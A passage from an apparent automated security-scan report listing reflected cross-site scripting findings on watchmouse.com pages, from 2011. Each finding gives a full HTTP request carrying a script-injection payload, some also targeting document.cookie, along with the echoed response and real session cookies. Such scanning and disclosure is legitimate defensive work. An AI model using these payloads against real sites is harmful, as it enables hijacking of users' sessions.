P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/def4770"><script>alert(1)</script>b1bfa4f784d/register.php" method="post">
...[SNIP]...

1.74. http://www.watchmouse.com/de/register.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/register.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dcd2"><script>alert(1)</script>9e0e36560e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/register.php6dcd2"><script>alert(1)</script>9e0e36560e6 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:36 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-6c28c41eb8a5ad96c79d9e6815400853"
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/de/register.php6dcd2"><script>alert(1)</script>9e0e36560e6" method="post">
...[SNIP]...

1.75. http://www.watchmouse.com/de/register.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/register.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e025"><script>alert(1)</script>42b73a4c46b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/register.php?vpackid=35&6e025"><script>alert(1)</script>42b73a4c46b=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:09:34 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-f7ca374cbe50be1a3e973b9c1ca8f862"
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<a href="/en/register.php?vpackid=35&6e025"><script>alert(1)</script>42b73a4c46b=1" onclick="$('#lang-menu').toggle();">
...[SNIP]...

1.76. http://www.watchmouse.com/en/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/

Issue detail

The value of the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4bed"><script>alert(1)</script>bd540385b51 was submitted in the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=1e4bed"><script>alert(1)</script>bd540385b51 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.5.10.1297252772

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:02:17 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-bba15ddb1485928b0e2ed1f78935fb0e"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 18584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=1e4bed"><script>alert(1)</script>bd540385b51" method="post">
...[SNIP]...

1.77. http://www.watchmouse.com/en/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddd46"><script>alert(1)</script>0d01ced535 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enddd46"><script>alert(1)</script>0d01ced535/ HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297196240.1

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:13 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-8554a5262131e380356c4537126bf406"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 12965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enddd46"><script>alert(1)</script>0d01ced535/" method="post">
...[SNIP]...

1.78. http://www.watchmouse.com/en/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d071"><script>alert(1)</script>03249d204b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/?3d071"><script>alert(1)</script>03249d204b0=1 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297196240.1

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 11:59:10 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-55cd5f01c95c28f94b01433ddf670d2b"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 17963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/?3d071"><script>alert(1)</script>03249d204b0=1" method="post">
...[SNIP]...

1.79. http://www.watchmouse.com/en/about.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/about.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bf3a"><script>alert(1)</script>b4e05ffea6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en5bf3a"><script>alert(1)</script>b4e05ffea6/about.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-2de1b838baead941d451f7712423405f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en5bf3a"><script>alert(1)</script>b4e05ffea6/about.php" method="post">
...[SNIP]...

1.80. http://www.watchmouse.com/en/about.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/about.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7666b"><script>alert(1)</script>9ef90d91779 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/about.php7666b"><script>alert(1)</script>9ef90d91779 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-e7137a3ab840a3e0251ac2115510deba"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/about.php7666b"><script>alert(1)</script>9ef90d91779" method="post">
...[SNIP]...

1.81. http://www.watchmouse.com/en/about.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/about.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53678"><script>alert(1)</script>acc434f8ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/about.php?53678"><script>alert(1)</script>acc434f8ec=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-5bbd8836fd93c32f613212de15af152a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/about.php?53678"><script>alert(1)</script>acc434f8ec=1" method="post">
...[SNIP]...

1.82. http://www.watchmouse.com/en/awards.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/awards.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d4da"><script>alert(1)</script>12f28bd53ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en5d4da"><script>alert(1)</script>12f28bd53ff/awards.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-9caa1a1cacc0e392a60c7accf386dd39"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en5d4da"><script>alert(1)</script>12f28bd53ff/awards.php" method="post">
...[SNIP]...

1.83. http://www.watchmouse.com/en/awards.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/awards.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 274a5"><script>alert(1)</script>1d422000328 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/awards.php274a5"><script>alert(1)</script>1d422000328 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-ffdc20efafc92e2e0699b688cca30de0"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/awards.php274a5"><script>alert(1)</script>1d422000328" method="post">
...[SNIP]...

1.84. http://www.watchmouse.com/en/awards.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/awards.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9943f"><script>alert(1)</script>4b064af620f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/awards.php?9943f"><script>alert(1)</script>4b064af620f=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-5da1abc66a03112f1248117e231da5b8"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/awards.php?9943f"><script>alert(1)</script>4b064af620f=1" method="post">
...[SNIP]...

1.85. http://www.watchmouse.com/en/chat.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/chat.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0b7b"><script>alert(1)</script>3befea24e05 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enb0b7b"><script>alert(1)</script>3befea24e05/chat.php HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:48 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-f92f46d24cd5d6a4dbfaaceeddb9f65e"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enb0b7b"><script>alert(1)</script>3befea24e05/chat.php" method="post">
...[SNIP]...

1.86. http://www.watchmouse.com/en/chat.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/chat.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25bf8"><script>alert(1)</script>8beb7a83912 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/chat.php25bf8"><script>alert(1)</script>8beb7a83912 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:56 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-00e8fce91f2cb68dcce9f1b6e0858e63"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/chat.php25bf8"><script>alert(1)</script>8beb7a83912" method="post">
...[SNIP]...

1.87. http://www.watchmouse.com/en/checkit.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/checkit.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11bc5"><script>alert(1)</script>0030cd96bc9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

